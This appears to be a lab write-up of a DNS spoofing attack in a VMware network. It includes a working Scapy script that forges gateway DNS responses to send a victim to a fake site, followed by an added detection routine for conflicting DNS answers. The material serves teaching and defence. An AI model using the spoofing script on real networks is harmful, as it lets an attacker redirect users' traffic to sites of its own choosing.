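Lab environment:
Set up a target website, www.wh.com
Network adapter (gateway): 192.168.146.2
Win7 (the spoofed victim) IP: 192.168.146.129
Win2008 (fake DNS server) IP: 192.168.146.130
1. Website setup
Win2008 network adapter
2. Run the Python code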
from scapy.all import *

wlan2 = "VMware Virtual Ethernet Adapter for VMnet8"
dns_server = "192.168.146.130"  # DNS server already set up on Win2008
dnsdst = ""

def rev(p):
    global dnsdst
    try:
        pip = p[IP]
        pudp = p[UDP]
        pdns = p[DNS]
        if pudp.dport == 53 and pip.dst == "192.168.146.2":  # query sent by Win7 to the gateway
            dnsdst = pip.src
            send(IP(src="192.168.146.1", dst=dns_server, ttl=55)/UDP(sport=pudp.sport, dport=53)/pdns, iface=wlan2)
            print("转发查询信息成功", dnsdst)  # "query forwarded successfully"
        elif pudp.sport == 53 and pip.src == dns_server:  # response that our own DNS server sent back to us
            # print(dnsdst)
            send(IP(src="192.168.146.2", dst="192.168.146.129", ttl=55)/UDP(sport=53, dport=pudp.dport)/pdns, iface=wlan2)
            print("转发响应信息成功")  # "response forwarded successfully"
    except Exception:
        pass  # ignore packets that lack an IP, UDP or DNS layer

print("开始攻击")  # "attack started"
sniff(iface=wlan2, filter="udp port 53", timeout=300, prn=rev)
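Hijack successful
Notes:
We capture and analyze the traffic with Wireshark (on the VMnet8 adapter)
1 (request): Win7 sends a domain name resolution request to the real gateway
2 (request): we impersonate a client and send the request to Win2008
3 (response): Win2008 returns the IP of the website we set up
4 (response): we pose as the real gateway 192.168.146.2 and reply to Win7, giving it the fake IP
5 (response): the real gateway returns the real IP it looked up to Win7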
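Packets 4 and 5 above are what a defender can key on: the same query receives two responses from the "gateway" with different answers. The following is an added detection example, not part of the original write-up; the record layout, the 203.0.113.10 "real" address, the 192.168.146.130 forged answer and the TTL of 128 are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample of DNS responses seen at the client (not a real capture).
# Fields: time (s), src IP, dst IP, dst port, DNS transaction id, qname, A records, IP TTL.
SAMPLE_RESPONSES = [
    # Forged response (packet 4) followed by the gateway's real one (packet 5).
    (10.001, "192.168.146.2", "192.168.146.129", 50001, 0x1A2B, "www.wh.com", ("192.168.146.130",), 55),
    (10.020, "192.168.146.2", "192.168.146.129", 50001, 0x1A2B, "www.wh.com", ("203.0.113.10",), 128),
    (11.500, "192.168.146.2", "192.168.146.129", 50002, 0x3C4D, "example.org", ("198.51.100.7",), 128),
    # Benign retransmission: the same answer twice must not alert.
    (12.000, "192.168.146.2", "192.168.146.129", 50003, 0x5E6F, "example.net", ("198.51.100.9",), 128),
    (12.300, "192.168.146.2", "192.168.146.129", 50003, 0x5E6F, "example.net", ("198.51.100.9",), 128),
]

def find_conflicting_responses(responses, window=2.0):
    """Return one alert per query that received responses with different answers."""
    by_query = defaultdict(list)
    for ts, src, dst, dport, txid, qname, answers, ip_ttl in responses:
        # A response is matched to its query by server, client, client port, id and name.
        key = (src, dst, dport, txid, qname.lower().rstrip("."))
        by_query[key].append((ts, frozenset(answers), ip_ttl))
    alerts = []
    for key, seen in by_query.items():
        seen.sort(key=lambda r: r[0])
        first_ts = seen[0][0]
        in_window = [r for r in seen if r[0] - first_ts <= window]
        if len({r[1] for r in in_window}) > 1:
            first = in_window[0][1]
            alerts.append({
                "client": key[1], "server": key[0], "qname": key[4], "txid": key[3],
                "first_answer": sorted(first),
                "later_answers": sorted({a for r in in_window[1:] for a in r[1]} - first),
                # Differing IP TTLs from "one" server suggest two different senders.
                "ip_ttls": sorted({r[2] for r in in_window}),
            })
    return alerts

if __name__ == "__main__":
    for alert in find_conflicting_responses(SAMPLE_RESPONSES):
        print(alert)
```

The client accepts whichever response arrives first, so the alert's first_answer is the address the victim actually used.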